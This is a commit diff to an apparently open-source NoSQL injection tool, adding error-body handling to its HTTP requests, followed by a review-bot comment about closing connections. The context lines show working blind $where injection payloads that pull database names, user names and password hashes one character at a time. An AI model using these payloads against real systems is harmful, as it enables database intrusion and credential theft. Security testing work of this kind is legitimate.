
Commit 9bcf017

Merge pull request #61 from andresriancho/master
Better error handling for web applications which respond with non-200…
2 parents 0c642e3 + 5dc778a commit 9bcf017

1 file changed

+59
-53
lines changed


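--- a/nsmweb.py
+++ b/nsmweb.py
@@ -58,7 +58,7 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
 req = urllib2.Request(appURL, None, requestHeaders)
 appRespCode = urllib2.urlopen(req).getcode()
 if appRespCode == 200:
-normLength = int(len(urllib2.urlopen(req).read()))
+normLength = int(len(getResponseBodyHandlingErrors(req)))
 timeReq = urllib2.urlopen(req)
 start = time.time()
 page = timeReq.read()
@@ -86,7 +86,6 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
 print "Using " + injectString + " for injection testing.\n"
 
 # Build a random string and insert; if the app handles input correctly, a random string and injected code should be treated the same.
-# Add error handling for Non-200 HTTP response codes if random strings freaks out the app.
 if "?" not in appURL:
 print "No URI parameters provided for GET request...Check your options.\n"
 raw_input("Press enter to continue...")
@@ -101,7 +100,9 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
 else:
 print "Sending random parameter value..."
 
-randLength = int(len(urllib2.urlopen(req).read()))
+responseBody = getResponseBodyHandlingErrors(req)
+randLength = int(len(responseBody))
+
 print "Got response length of " + str(randLength) + "."
 randNormDelta = abs(normLength - randLength)
 
@@ -117,10 +118,10 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
 
 # Test for errors returned by injection
 req = urllib2.Request(uriArray[1], None, requestHeaders)
-errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
+errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
 
 if errorCheck == False:
-injLen = int(len(urllib2.urlopen(req).read()))
+injLen = int(len(getResponseBodyHandlingErrors(req)))
 checkResult(randLength,injLen,testNum,verb,None)
 testNum += 1
 else:
@@ -135,11 +136,11 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
 
 print uriArray[2]
 req = urllib2.Request(uriArray[2], None, requestHeaders)
-errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
+errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
 
 
 if errorCheck == False:
-injLen = int(len(urllib2.urlopen(req).read()))
+injLen = int(len(getResponseBodyHandlingErrors(req)))
 checkResult(randLength,injLen,testNum,verb,None)
 testNum += 1
 
@@ -154,11 +155,11 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
 print "Test 3: $where injection (integer escape)"
 
 req = urllib2.Request(uriArray[3], None, requestHeaders)
-errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
+errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
 
 
 if errorCheck == False:
-injLen = int(len(urllib2.urlopen(req).read()))
+injLen = int(len(getResponseBodyHandlingErrors(req)))
 checkResult(randLength,injLen,testNum,verb,None)
 testNum +=1
 
@@ -174,10 +175,10 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
 print "Test 4: $where injection string escape (single record)"
 
 req = urllib2.Request(uriArray[4], None, requestHeaders)
-errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
+errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
 
 if errorCheck == False:
-injLen = int(len(urllib2.urlopen(req).read()))
+injLen = int(len(getResponseBodyHandlingErrors(req)))
 checkResult(randLength,injLen,testNum,verb,None)
 testNum += 1
 else:
@@ -191,10 +192,10 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
 print "Test 5: $where injection integer escape (single record)"
 
 req = urllib2.Request(uriArray[5], None, requestHeaders)
-errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
+errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
 
 if errorCheck == False:
-injLen = int(len(urllib2.urlopen(req).read()))
+injLen = int(len(getResponseBodyHandlingErrors(req)))
 checkResult(randLength,injLen,testNum,verb,None)
 testNum +=1
 
@@ -209,10 +210,10 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
 print "Test 6: This != injection (string escape)"
 
 req = urllib2.Request(uriArray[6], None, requestHeaders)
-errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
+errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
 
 if errorCheck == False:
-injLen = int(len(urllib2.urlopen(req).read()))
+injLen = int(len(getResponseBodyHandlingErrors(req)))
 checkResult(randLength,injLen,testNum,verb,None)
 testNum += 1
 else:
@@ -226,10 +227,10 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
 print "Test 7: This != injection (integer escape)"
 
 req = urllib2.Request(uriArray[7], None, requestHeaders)
-errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
+errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
 
 if errorCheck == False:
-injLen = int(len(urllib2.urlopen(req).read()))
+injLen = int(len(getResponseBodyHandlingErrors(req)))
 checkResult(randLength,injLen,testNum,verb,None)
 testNum += 1
 else:
@@ -244,10 +245,10 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
 print "Test 8: PHP/ExpressJS > Undefined Injection"
 
 req = urllib2.Request(uriArray[8], None, requestHeaders)
-errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
+errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
 
 if errorCheck == False:
-injLen = int(len(urllib2.urlopen(req).read()))
+injLen = int(len(getResponseBodyHandlingErrors(req)))
 checkResult(randLength,injLen,testNum,verb,None)
 testNum += 1
 
@@ -258,10 +259,8 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
 print "Starting Javascript string escape time based injection..."
 req = urllib2.Request(uriArray[18], None, requestHeaders)
 start = time.time()
-strTimeInj = urllib2.urlopen(req)
-page = strTimeInj.read()
+page = getResponseBodyHandlingErrors(req)
 end = time.time()
-strTimeInj.close()
 #print str(end)
 #print str(start)
 strTimeDelta = (int(round((end - start), 3)) - timeBase)
@@ -277,10 +276,8 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
 print "Starting Javascript integer escape time based injection..."
 req = urllib2.Request(uriArray[9], None, requestHeaders)
 start = time.time()
-intTimeInj = urllib2.urlopen(req)
-page = intTimeInj.read()
+page = getResponseBodyHandlingErrors(req)
 end = time.time()
-intTimeInj.close()
 #print str(end)
 #print str(start)
 intTimeDelta = (int(round((end - start), 3)) - timeBase)
@@ -348,6 +345,15 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
 return()
 
 
+def getResponseBodyHandlingErrors(req):
+try:
+responseBody = urllib2.urlopen(req).read()
+except urllib2.HTTPError, err:
+responseBody = err.read()
+
+return responseBody
+
+
 def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
 print "Web App Attacks (POST)"
 print "==============="
@@ -386,7 +392,7 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
 
 if appRespCode == 200:
 
-normLength = int(len(urllib2.urlopen(req).read()))
+normLength = int(len(getResponseBodyHandlingErrors(req)))
 timeReq = urllib2.urlopen(req)
 start = time.time()
 page = timeReq.read()
@@ -438,7 +444,7 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
 
 body = urllib.urlencode(postData)
 req = urllib2.Request(appURL,body, requestHeaders)
-randLength = int(len(urllib2.urlopen(req).read()))
+randLength = int(len(getResponseBodyHandlingErrors(req)))
 print "Got response length of " + str(randLength) + "."
 
 randNormDelta = abs(normLength - randLength)
@@ -460,10 +466,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
 else:
 print "Test 1: PHP/ExpressJS != associative array injection"
 
-errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
+errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
 
 if errorCheck == False:
-injLen = int(len(urllib2.urlopen(req).read()))
+injLen = int(len(getResponseBodyHandlingErrors(req)))
 checkResult(randLength,injLen,testNum,verb,postData)
 testNum += 1
 
@@ -487,10 +493,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
 else:
 print "Test 2: PHP/ExpressJS > Undefined Injection"
 
-errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
+errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
 
 if errorCheck == False:
-injLen = int(len(urllib2.urlopen(req).read()))
+injLen = int(len(getResponseBodyHandlingErrors(req)))
 checkResult(randLength,injLen,testNum,verb,postData)
 testNum += 1
 
@@ -504,10 +510,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
 else:
 print "Test 3: $where injection (string escape)"
 
-errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
+errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
 
 if errorCheck == False:
-injLen = int(len(urllib2.urlopen(req).read()))
+injLen = int(len(getResponseBodyHandlingErrors(req)))
 checkResult(randLength,injLen,testNum,verb,postData)
 testNum += 1
 else:
@@ -524,10 +530,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
 else:
 print "Test 4: $where injection (integer escape)"
 
-errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
+errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
 
 if errorCheck == False:
-injLen = int(len(urllib2.urlopen(req).read()))
+injLen = int(len(getResponseBodyHandlingErrors(req)))
 checkResult(randLength,injLen,testNum,verb,postData)
 testNum += 1
 else:
@@ -545,10 +551,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
 else:
 print "Test 5: $where injection string escape (single record)"
 
-errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
+errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
 
 if errorCheck == False:
-injLen = int(len(urllib2.urlopen(req).read()))
+injLen = int(len(getResponseBodyHandlingErrors(req)))
 checkResult(randLength,injLen,testNum,verb,postData)
 testNum += 1
 
@@ -566,10 +572,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
 else:
 print "Test 6: $where injection integer escape (single record)"
 
-errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
+errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
 
 if errorCheck == False:
-injLen = int(len(urllib2.urlopen(req).read()))
+injLen = int(len(getResponseBodyHandlingErrors(req)))
 checkResult(randLength,injLen,testNum,verb,postData)
 testNum += 1
 
@@ -588,10 +594,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
 else:
 print "Test 7: This != injection (string escape)"
 
-errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
+errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
 
 if errorCheck == False:
-injLen = int(len(urllib2.urlopen(req).read()))
+injLen = int(len(getResponseBodyHandlingErrors(req)))
 checkResult(randLength,injLen,testNum,verb,postData)
 testNum += 1
 print "\n"
@@ -608,10 +614,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
 else:
 print "Test 8: This != injection (integer escape)"
 
-errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
+errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
 
 if errorCheck == False:
-injLen = int(len(urllib2.urlopen(req).read()))
+injLen = int(len(getResponseBodyHandlingErrors(req)))
 checkResult(randLength,injLen,testNum,verb,postData)
 testNum += 1
 
@@ -974,7 +980,7 @@ def getDBInfo():
 trueUri = uriArray[16].replace("---","return true; var dummy ='!" + "&")
 #print "Debug " + str(trueUri)
 req = urllib2.Request(trueUri, None, requestHeaders)
-baseLen = int(len(urllib2.urlopen(req).read()))
+baseLen = int(len(getResponseBodyHandlingErrors(req)))
 print "Got baseline true query length of " + str(baseLen)
 
 print "Calculating DB name length..."
@@ -983,7 +989,7 @@ def getDBInfo():
 calcUri = uriArray[16].replace("---","var curdb = db.getName(); if (curdb.length ==" + str(curLen) + ") {return true;} var dum='a" + "&")
 #print "Debug: " + calcUri
 req = urllib2.Request(calcUri, None, requestHeaders)
-lenUri = int(len(urllib2.urlopen(req).read()))
+lenUri = int(len(getResponseBodyHandlingErrors(req)))
 #print "Debug length: " + str(lenUri)
 
 if lenUri == baseLen:
@@ -998,7 +1004,7 @@ def getDBInfo():
 charUri = uriArray[16].replace("---","var curdb = db.getName(); if (curdb.charAt(" + str(nameCounter) + ") == '"+ chars[charCounter] + "') { return true; } var dum='a" + "&")
 
 req = urllib2.Request(charUri, None, requestHeaders)
-lenUri = int(len(urllib2.urlopen(req).read()))
+lenUri = int(len(getResponseBodyHandlingErrors(req)))
 
 if lenUri == baseLen:
 dbName = dbName + chars[charCounter]
@@ -1024,7 +1030,7 @@ def getDBInfo():
 usrCntUri = uriArray[16].replace("---","var usrcnt = db.system.users.count(); if (usrcnt == " + str(usrCount) + ") { return true; } var dum='a")
 
 req = urllib2.Request(usrCntUri, None, requestHeaders)
-lenUri = int(len(urllib2.urlopen(req).read()))
+lenUri = int(len(getResponseBodyHandlingErrors(req)))
 
 if lenUri == baseLen:
 print "Found " + str(usrCount) + " user(s)."
@@ -1050,7 +1056,7 @@ def getDBInfo():
 usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.user.length == " + str(usrChars) + ") { return true; } var dum='a" + "&")
 
 req = urllib2.Request(usrUri, None, requestHeaders)
-lenUri = int(len(urllib2.urlopen(req).read()))
+lenUri = int(len(getResponseBodyHandlingErrors(req)))
 
 if lenUri == baseLen:
 # Got the right number of characters
@@ -1063,7 +1069,7 @@ def getDBInfo():
 usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.user.charAt(" + str(rightCharsUsr) + ") == '"+ chars[charCounterUsr] + "') { return true; } var dum='a" + "&")
 
 req = urllib2.Request(usrUri, None, requestHeaders)
-lenUri = int(len(urllib2.urlopen(req).read()))
+lenUri = int(len(getResponseBodyHandlingErrors(req)))
 
 if lenUri == baseLen:
 username = username + chars[charCounterUsr]
@@ -1088,7 +1094,7 @@ def getDBInfo():
 hashUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.pwd.charAt(" + str(rightCharsHash) + ") == '"+ chars[charCounterHash] + "') { return true; } var dum='a" + "&")
 
 req = urllib2.Request(hashUri, None, requestHeaders)
-lenUri = int(len(urllib2.urlopen(req).read()))
+lenUri = int(len(getResponseBodyHandlingErrors(req)))
 
 if lenUri == baseLen:
 pwdHash = pwdHash + chars[charCounterHash]
@@ -1111,7 +1117,7 @@ def getDBInfo():
 usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.user.length == " + str(usrChars) + ") { return true; } var dum='a" + "&")
 
 req = urllib2.Request(usrUri, None, requestHeaders)
-lenUri = int(len(urllib2.urlopen(req).read()))
+lenUri = int(len(getResponseBodyHandlingErrors(req)))
 
 if lenUri == baseLen:
 # Got the right number of characters
@@ -1124,7 +1130,7 @@ def getDBInfo():
 usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.user.charAt(" + str(rightCharsUsr) + ") == '"+ chars[charCounterUsr] + "') { return true; } var dum='a" + "&")
 
 req = urllib2.Request(usrUri, None, requestHeaders)
-lenUri = int(len(urllib2.urlopen(req).read()))
+lenUri = int(len(getResponseBodyHandlingErrors(req)))
 
 if lenUri == baseLen:
 username = username + chars[charCounterUsr]
@@ -1146,7 +1152,7 @@ def getDBInfo():
 hashUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.pwd.charAt(" + str(rightCharsHash) + ") == '"+ chars[charCounterHash] + "') { return true; } vardum='a" + "&")
 
 req = urllib2.Request(hashUri, None, requestHeaders)
-lenUri = int(len(urllib2.urlopen(req).read()))
+lenUri = int(len(getResponseBodyHandlingErrors(req)))
 
 if lenUri == baseLen:
 pwdHash = pwdHash + chars[charCounterHash]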
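Review bot: getResponseBodyHandlingErrors (hunk `@@ -348,6 +345,15`) returns `err.read()` for every urllib2.HTTPError, so a 4xx/5xx error page is fed to the same `injLen` and `lenUri == baseLen` length comparisons as a 200 body with nothing telling the operator that the status changed; printing `err.code` before returning keeps that visible, and the length-based checks in getDBInfo should be read with that in mind. The helper also never closes the response, while the two time-based hunks (`@@ -258,10 +259,8` and `@@ -277,10 +276,8`) drop the `strTimeInj.close()` and `intTimeInj.close()` calls that used to do so, so each connection now lingers until garbage collection; a try/finally around `read()` restores the old behaviour. The helper has no docstring; it should state that on a non-2xx status the error page body is returned so callers know why a length is still produced. urllib2.URLError (connection refused, timeout) still propagates uncaught, which may be intended given the commit title.

```python
def getResponseBodyHandlingErrors(req):
    """Return the response body for req.

    On a non-2xx status urllib2 raises HTTPError; the error page body is
    returned instead so callers can still compare lengths, and the status
    is printed so the operator can tell the two cases apart.
    """
    try:
        resp = urllib2.urlopen(req)
    except urllib2.HTTPError, err:
        print "Got HTTP " + str(err.code) + " response; using its body for comparison."
        resp = err
    try:
        return resp.read()
    finally:
        resp.close()
```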
